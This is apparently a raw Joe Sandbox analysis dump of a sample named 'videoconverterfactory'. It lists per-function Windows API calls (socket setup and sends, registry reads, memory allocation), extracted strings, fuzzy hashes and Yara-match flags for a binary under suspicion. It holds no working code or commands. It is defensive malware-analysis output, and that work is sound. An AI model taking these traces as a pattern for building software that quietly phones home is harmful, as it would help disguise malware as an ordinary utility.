                                                                                                      • Opcode Fuzzy Hash: 6329790a470c0c4e3f47668c909b0381a60f69ca925b826b0bda9d518365272d
                                                                                                      • Instruction Fuzzy Hash: F0F0C270240211ABEB219E6CEC80F9573E8EF59725F24056AF548D7380C7A1EC92CA90
                                                                                                      APIs
                                                                                                      • InterlockedIncrement.KERNEL32(02D5529C), ref: 02D21ABA
                                                                                                      • WSAStartup.WS2_32(00000002,00000000), ref: 02D21ACB
                                                                                                      • InterlockedExchange.KERNEL32(02D552A0,00000000), ref: 02D21AD7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked$ExchangeIncrementStartup
                                                                                                      • String ID:
                                                                                                      • API String ID: 1856147945-0
                                                                                                      • Opcode ID: 3815194b50b56a766773e46d83c536269388e24b89109f54980d104929c52956
                                                                                                      • Instruction ID: 3d5e7abc2a04279ff982222ddf6cb76c4cb106f2d765877c2a5e5a9eaca2334f
                                                                                                      • Opcode Fuzzy Hash: 3815194b50b56a766773e46d83c536269388e24b89109f54980d104929c52956
                                                                                                      • Instruction Fuzzy Hash: E1D02E39C842142BE2206AA0BD0EA3837ACD306312FD00640FD69C03C0EA827C2886A3
                                                                                                      APIs
                                                                                                      • __getptd_noexit.LIBCMT ref: 02D324A7
                                                                                                        • Part of subcall function 02D348E2: GetLastError.KERNEL32(76F90A60,76F8F550,02D34AD0,02D32043,76F8F550,?,02D25A0D,00000104,76F90A60,76F8F550,ntdll.dll,?,?,?,02D25EE9), ref: 02D348E4
                                                                                                        • Part of subcall function 02D348E2: __calloc_crt.LIBCMT ref: 02D34905
                                                                                                        • Part of subcall function 02D348E2: __initptd.LIBCMT ref: 02D34927
                                                                                                        • Part of subcall function 02D348E2: GetCurrentThreadId.KERNEL32 ref: 02D3492E
                                                                                                        • Part of subcall function 02D348E2: SetLastError.KERNEL32(00000000,02D25A0D,00000104,76F90A60,76F8F550,ntdll.dll,?,?,?,02D25EE9), ref: 02D34946
                                                                                                      • __freeptd.LIBCMT ref: 02D324C1
                                                                                                        • Part of subcall function 02D325A6: LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D324C0), ref: 02D325C0
                                                                                                        • Part of subcall function 02D325A6: GetProcAddress.KERNEL32(00000000), ref: 02D325C7
                                                                                                        • Part of subcall function 02D325A6: RtlEncodePointer.NTDLL(00000000), ref: 02D325D2
                                                                                                        • Part of subcall function 02D325A6: RtlDecodePointer.NTDLL(02D324C0), ref: 02D325ED
                                                                                                      • RtlExitUserThread.NTDLL(?,00000000,?,02D32483,00000000), ref: 02D324CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastPointerThread$AddressCurrentDecodeEncodeExitLibraryLoadProcUser__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 2811226776-0
                                                                                                      • Opcode ID: 15b79810e09a8f050c214260232533fa4ce1ce119c1f73961233a48568c73048
                                                                                                      • Instruction ID: de69ea31e78edd0debe1ebdb3ff36964fe5c214ad7070dd7018e6d75c05325c2
                                                                                                      • Opcode Fuzzy Hash: 15b79810e09a8f050c214260232533fa4ce1ce119c1f73961233a48568c73048
                                                                                                      • Instruction Fuzzy Hash: 3DD05E31C06A6467C6273A64C40C64A3759AF00768F040014D904053409B385E40C9B5
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040D462
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401ECB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                      • API String ID: 71445658-2036018995
                                                                                                      • Opcode ID: 5ef05da2e287be01386b56ae824994a6b26e10f78201ff3431983e722134a090
                                                                                                      • Instruction ID: 994463204173b452b333b57129a026f6a75899614503d205bfe621b629104024
                                                                                                      • Opcode Fuzzy Hash: 5ef05da2e287be01386b56ae824994a6b26e10f78201ff3431983e722134a090
                                                                                                      • Instruction Fuzzy Hash: 7CD02B1053C252E5C61013304D0D6F6376497223907600133E802B31D2E33D4707D46F
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040D462
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401ECB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                      • API String ID: 71445658-2036018995
                                                                                                      • Opcode ID: d54d18ebaca51a3a4b16b1e7f3d4270bf56b9e249673d27e042b07f750a77e47
                                                                                                      • Instruction ID: 6ab278ff3794771d0c05d303e076f6f752893f2bc1c2be07f58e288e60927e7e
                                                                                                      • Opcode Fuzzy Hash: d54d18ebaca51a3a4b16b1e7f3d4270bf56b9e249673d27e042b07f750a77e47
                                                                                                      • Instruction Fuzzy Hash: 2AC08C20B14102D9EA008AB04E4CB262264AB00744F20043B9807F21C0E3B89409ED1F
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D24BF2
                                                                                                        • Part of subcall function 02D21BA7: __EH_prolog.LIBCMT ref: 02D21BAC
                                                                                                        • Part of subcall function 02D21BA7: RtlEnterCriticalSection.NTDLL ref: 02D21BBC
                                                                                                        • Part of subcall function 02D21BA7: RtlLeaveCriticalSection.NTDLL ref: 02D21BEA
                                                                                                        • Part of subcall function 02D21BA7: RtlEnterCriticalSection.NTDLL ref: 02D21C13
                                                                                                        • Part of subcall function 02D21BA7: RtlLeaveCriticalSection.NTDLL ref: 02D21C56
                                                                                                        • Part of subcall function 02D2D0FD: __EH_prolog.LIBCMT ref: 02D2D102
                                                                                                        • Part of subcall function 02D2D0FD: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D2D181
                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02D24CF2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1927618982-0
                                                                                                      • Opcode ID: 65ce369c9016c4ae00e931f912c73876348b63c797310982d0134707cf444aa0
                                                                                                      • Instruction ID: 45dd8c785535dd496b4efd9cc2e41e394fa289ce2ae5baf4399d16d0d92cf7d2
                                                                                                      • Opcode Fuzzy Hash: 65ce369c9016c4ae00e931f912c73876348b63c797310982d0134707cf444aa0
                                                                                                      • Instruction Fuzzy Hash: C851F875D04258DFDB15DFA8C484AEEBBB5EF28318F14815AE905AB351DB309E48CF60
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Software\EVCFactory57
                                                                                                      • API String ID: 0-1226175547
                                                                                                      • Opcode ID: faeae569f1bff3bc5f2d1e4badbb068eb81342c648fe046371049fb22da32726
                                                                                                      • Instruction ID: f4e621b970724f32723ec92b6617571dc1a6368be937146a85ed4f002fa4de5a
                                                                                                      • Opcode Fuzzy Hash: faeae569f1bff3bc5f2d1e4badbb068eb81342c648fe046371049fb22da32726
                                                                                                      • Instruction Fuzzy Hash: 8B11AF36A082429BC3118BB488265D5BF90FF4231075845BBC446B70E6C334844BCA8A
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D22D47
                                                                                                      • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D22D5C
                                                                                                        • Part of subcall function 02D2950E: WSAGetLastError.WS2_32(00000000,?,?,02D22A51), ref: 02D2951C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$Send
                                                                                                      • String ID:
                                                                                                      • API String ID: 1282938840-0
                                                                                                      • Opcode ID: 3c332b238fe63fae5c31877172d8a22ebff6c67cd41cceb8db1e1af8d823b0f2
                                                                                                      • Instruction ID: ebd73ad80199cc62e6ba75f7dc94f47b77f4d338704bd8701e99887e45dc73c8
                                                                                                      • Opcode Fuzzy Hash: 3c332b238fe63fae5c31877172d8a22ebff6c67cd41cceb8db1e1af8d823b0f2
                                                                                                      • Instruction Fuzzy Hash: 3D0184B5904215EFD7205FA4D85496BBBFDEF55768B20096EF89983300DB709D04CBA1
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID: Wind
                                                                                                      • API String ID: 4275171209-2168060864
                                                                                                      • Opcode ID: cb64e78accfd5550945b64eb47a9cd4f4de17cc81304712c4b171e5fa87d105d
                                                                                                      • Instruction ID: abbba1d829fc36b5269af80708c5bab726d5499de4b849cbaf0ffa6c79d6ee15
                                                                                                      • Opcode Fuzzy Hash: cb64e78accfd5550945b64eb47a9cd4f4de17cc81304712c4b171e5fa87d105d
                                                                                                      • Instruction Fuzzy Hash: 5FF0F6A484D145DAC7058FE08A48569BA647A01300B3410B79843771E2C27C464BEBAF
                                                                                                      APIs
                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02D2740C
                                                                                                      • shutdown.WS2_32(?,00000002), ref: 02D27415
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastshutdown
                                                                                                      • String ID:
                                                                                                      • API String ID: 1920494066-0
                                                                                                      • Opcode ID: 87208ad1fe5cdc3344e59d5e492503bfb2c72d59c812fd4ad1a67492a0d4179d
                                                                                                      • Instruction ID: 6eea55e33a631136b08a205d3c7ffde3c30df5325afe463da73c606397b946bb
                                                                                                      • Opcode Fuzzy Hash: 87208ad1fe5cdc3344e59d5e492503bfb2c72d59c812fd4ad1a67492a0d4179d
                                                                                                      • Instruction Fuzzy Hash: A8F0B435A043248FD7209F24E414B5ABBE5EF29729F108819ED9997380D730AC11CBA1
                                                                                                      APIs
                                                                                                      • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040D83A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrcmpi
                                                                                                      • String ID: /chk
                                                                                                      • API String ID: 1586166983-3837807730
                                                                                                      • Opcode ID: ca802e415fbe136a6de2647275b032b5febeac02430efd5fb1e554358c0401a3
                                                                                                      • Instruction ID: 3c4a0673f303a77804557ff59b318f5cafc8c2d4361543ca073feffa71d9ba3c
                                                                                                      • Opcode Fuzzy Hash: ca802e415fbe136a6de2647275b032b5febeac02430efd5fb1e554358c0401a3
                                                                                                      • Instruction Fuzzy Hash: 2EF09035905625CAC7149F948E887E9B7B4AB45306F1080B6D849B6191C778C98ADF4A
                                                                                                      APIs
                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                                        • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                                      • HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                                        • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocCreateDestroyVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 2507506473-0
                                                                                                      • Opcode ID: 0e50683ef5f87bfa7b7a3a131c3d96fe51d1ce1a964ea2283cbc2ce75e6f1d9c
                                                                                                      • Instruction ID: 550f2133393d729a37de5e2391f12db29a8156ca4bb40a4077295a364e13fd94
                                                                                                      • Opcode Fuzzy Hash: 0e50683ef5f87bfa7b7a3a131c3d96fe51d1ce1a964ea2283cbc2ce75e6f1d9c
                                                                                                      • Instruction Fuzzy Hash: A5F030706547019DDB101F319E4572A3AA89B4075BF10447FF900F91D1EFBC9684951D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3132538880-0
                                                                                                      • Opcode ID: b3f0a3012cda2ecbe676877ab2258b2c6f7eb0038d64c8daf59180ebaf6a9e9e
                                                                                                      • Instruction ID: dd6baf86791073165f8e6d056827b5d6c0182e1885c9b9beb2f6411162bbd969
                                                                                                      • Opcode Fuzzy Hash: b3f0a3012cda2ecbe676877ab2258b2c6f7eb0038d64c8daf59180ebaf6a9e9e
                                                                                                      • Instruction Fuzzy Hash: 61B00235404414DBCB551F50DF0D5587A71A748319F1204B5E3C670070CF350959BF1D
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D2511E
                                                                                                        • Part of subcall function 02D23D7E: htons.WS2_32(?), ref: 02D23DA2
                                                                                                        • Part of subcall function 02D23D7E: htonl.WS2_32(00000000), ref: 02D23DB9
                                                                                                        • Part of subcall function 02D23D7E: htonl.WS2_32(00000000), ref: 02D23DC0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: htonl$H_prologhtons
                                                                                                      • String ID:
                                                                                                      • API String ID: 4039807196-0
                                                                                                      • Opcode ID: 95aa2d40bb0d104140c7638a44e43e2e26ecf1c8c84b8c1aeaf26a446bc34a65
                                                                                                      • Instruction ID: a2634b51af2a73f2af819f8845a7c5125deaf58a62ae2cbfbabd50fc90388745
                                                                                                      • Opcode Fuzzy Hash: 95aa2d40bb0d104140c7638a44e43e2e26ecf1c8c84b8c1aeaf26a446bc34a65
                                                                                                      • Instruction Fuzzy Hash: 5A812871D0425A8ECF05DFA8D190AEEBBB5EF58218F20815AD854B7380EB755E09CF70
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID:
                                                                                                      • API String ID: 3519838083-0
                                                                                                      • Opcode ID: f1bdcbea4c7e0ea759f4af8fc48e8125573318089f4d085905d70bb81a84744e
                                                                                                      • Instruction ID: 4fe20496db32bccfbb5cd612f704bd0f196aa3ac625baf9191ad652888008616
                                                                                                      • Opcode Fuzzy Hash: f1bdcbea4c7e0ea759f4af8fc48e8125573318089f4d085905d70bb81a84744e
                                                                                                      • Instruction Fuzzy Hash: 8B415C7190021AEFCF14DF98C890EEEBBB9FF48318F10406AE945A7240D7749A49CF60
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D58000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D58000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d58000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 5c4e5655943009fb1092766a597991e22599825527628d79677a681d279093ed
                                                                                                      • Instruction ID: abd54977ba7fd54d836c720b9784f21db2805dff1873c10795682a50db4ef1a4
                                                                                                      • Opcode Fuzzy Hash: 5c4e5655943009fb1092766a597991e22599825527628d79677a681d279093ed
                                                                                                      • Instruction Fuzzy Hash: CD31547A44C205AFCB02AF28DC856A9FBF4EF45210F140A68DAC1C7651E7319861CAD3
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D2D9CB
                                                                                                        • Part of subcall function 02D21A01: TlsGetValue.KERNEL32 ref: 02D21A0A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prologValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3700342317-0
                                                                                                      • Opcode ID: b90cd0418acb4f672edda962a86ade812fe3c441601e9c8554a892b98b20fc9f
                                                                                                      • Instruction ID: 5a042e0fb3faab5ed885a61d3c99ee7d95138d37718d3f5cfaf1dea1c3b996d7
                                                                                                      • Opcode Fuzzy Hash: b90cd0418acb4f672edda962a86ade812fe3c441601e9c8554a892b98b20fc9f
                                                                                                      • Instruction Fuzzy Hash: FF213DB1908219AFDB00DFA9D440AEEBBF9FF59314F10811EE814A3340D771AD05CBA0
                                                                                                      APIs
                                                                                                      • SHGetSpecialFolderPathA.SHELL32 ref: 02D71009
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D58000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D58000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d58000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FolderPathSpecial
                                                                                                      • String ID:
                                                                                                      • API String ID: 994120019-0
                                                                                                      • Opcode ID: 13439ec6ce6bb3d9d2f1a2cf99bb2205c419bd6bced7ec92e2572c6f675d6c4d
                                                                                                      • Instruction ID: bdceb272cba3198614ea7ade236f19d21372c41facce62f34127b66ae30d07fc
                                                                                                      • Opcode Fuzzy Hash: 13439ec6ce6bb3d9d2f1a2cf99bb2205c419bd6bced7ec92e2572c6f675d6c4d
                                                                                                      • Instruction Fuzzy Hash: EC11C4B210C600DFF302AF18EC856BEFBE5EB94320F11892DE6C582B14E675D845CA93
                                                                                                      APIs
                                                                                                        • Part of subcall function 02D2C3C9: __EH_prolog.LIBCMT ref: 02D2C3CE
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02D2CCB3
                                                                                                        • Part of subcall function 02D331CA: RaiseException.KERNEL32(?,?,02D2EB64,?,?,?,?,?,?,?,02D2EB64,?,02D4ECA8,?), ref: 02D3321F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionException@8H_prologRaiseThrow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1681477883-0
                                                                                                      • Opcode ID: 53e1787581c66383c936475dc3dd7bb7aba4efa2bcb411e416d9f72fab99c19d
                                                                                                      • Instruction ID: 578a38abd047eb273c4a35445114f9ba4a58951b92da3910a8a313b5c623687f
                                                                                                      • Opcode Fuzzy Hash: 53e1787581c66383c936475dc3dd7bb7aba4efa2bcb411e416d9f72fab99c19d
                                                                                                      • Instruction Fuzzy Hash: FCF0AF719102186FD618ABADD845D9BB3ECDB08314B00055DF60693600EAA1F9148AF1
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D2D55B
                                                                                                        • Part of subcall function 02D226DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D22706
                                                                                                        • Part of subcall function 02D226DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D2272B
                                                                                                        • Part of subcall function 02D226DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D43173), ref: 02D22738
                                                                                                        • Part of subcall function 02D226DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D22778
                                                                                                        • Part of subcall function 02D226DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D227D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                      • String ID:
                                                                                                      • API String ID: 4293676635-0
                                                                                                      • Opcode ID: 32c2a8de55b7464fd62681eeabf0b158163465dd67ec6a89b7f1f5dd273b6ec2
                                                                                                      • Instruction ID: c8617c1c433dccc253ac1914d7efe1f09f49b7e56a3875f3ec9b1a7d0a47736a
                                                                                                      • Opcode Fuzzy Hash: 32c2a8de55b7464fd62681eeabf0b158163465dd67ec6a89b7f1f5dd273b6ec2
                                                                                                      • Instruction Fuzzy Hash: FE0190B1900B589FC328CF1AC544956FBF5EF98314B15C5AF98498B722EB71DA40CF94
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D58000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D58000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d58000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: 7768b30b0d9d48227034867cb732f51adca8886823c5e30fae0139034fc61c82
                                                                                                      • Instruction ID: b1464492708184422704e7066cdc7a76d49fa6a93dff2c8c2c668832a64b4628
                                                                                                      • Opcode Fuzzy Hash: 7768b30b0d9d48227034867cb732f51adca8886823c5e30fae0139034fc61c82
                                                                                                      • Instruction Fuzzy Hash: 73F030B6448208EFD7117F44EC05A6ABBE8EB18610F040914ABD082301E776AD648AA7
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02D2D33A
                                                                                                        • Part of subcall function 02D327C5: _malloc.LIBCMT ref: 02D327DD
                                                                                                        • Part of subcall function 02D2D556: __EH_prolog.LIBCMT ref: 02D2D55B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$_malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 4254904621-0
                                                                                                      • Opcode ID: 8d7f7617cb34f4684da044b235b16dfb243c38cbea87e3ac86a92e7152aea4c0
                                                                                                      • Instruction ID: a37fac259475f9448b9d3d5780542f3a0f01f1aa786109673580e5731400c671
                                                                                                      • Opcode Fuzzy Hash: 8d7f7617cb34f4684da044b235b16dfb243c38cbea87e3ac86a92e7152aea4c0
                                                                                                      • Instruction Fuzzy Hash: 62E08C71A04115ABEB19EF68D80172D77A6EB48704F0045AEBC09E2340EF719D00CA24
                                                                                                      APIs
                                                                                                        • Part of subcall function 02D348CA: __getptd_noexit.LIBCMT ref: 02D348CB
                                                                                                        • Part of subcall function 02D348CA: __amsg_exit.LIBCMT ref: 02D348D8
                                                                                                        • Part of subcall function 02D324A3: __getptd_noexit.LIBCMT ref: 02D324A7
                                                                                                        • Part of subcall function 02D324A3: __freeptd.LIBCMT ref: 02D324C1
                                                                                                        • Part of subcall function 02D324A3: RtlExitUserThread.NTDLL(?,00000000,?,02D32483,00000000), ref: 02D324CA
                                                                                                      • __XcptFilter.LIBCMT ref: 02D3248F
                                                                                                        • Part of subcall function 02D37954: __getptd_noexit.LIBCMT ref: 02D37958
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                                      • String ID:
                                                                                                      • API String ID: 1405322794-0
                                                                                                      • Opcode ID: 4626d39e5153587c79aae0b29c941a06e5089a484340d2e97d6716485a6d8fb0
                                                                                                      • Instruction ID: b3f11a68fa5ac217dd55cce21901b0c12c950bd3364025f8177223a5916dfacb
                                                                                                      • Opcode Fuzzy Hash: 4626d39e5153587c79aae0b29c941a06e5089a484340d2e97d6716485a6d8fb0
                                                                                                      • Instruction Fuzzy Hash: A7E0ECF1D006049FFB09ABA0D949F6DB766EF44321F200189E5019B370DA749D44DE30
                                                                                                      APIs
                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002), ref: 00402220
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2623313104.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2623313104.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_videoconverterfactory.jbxd
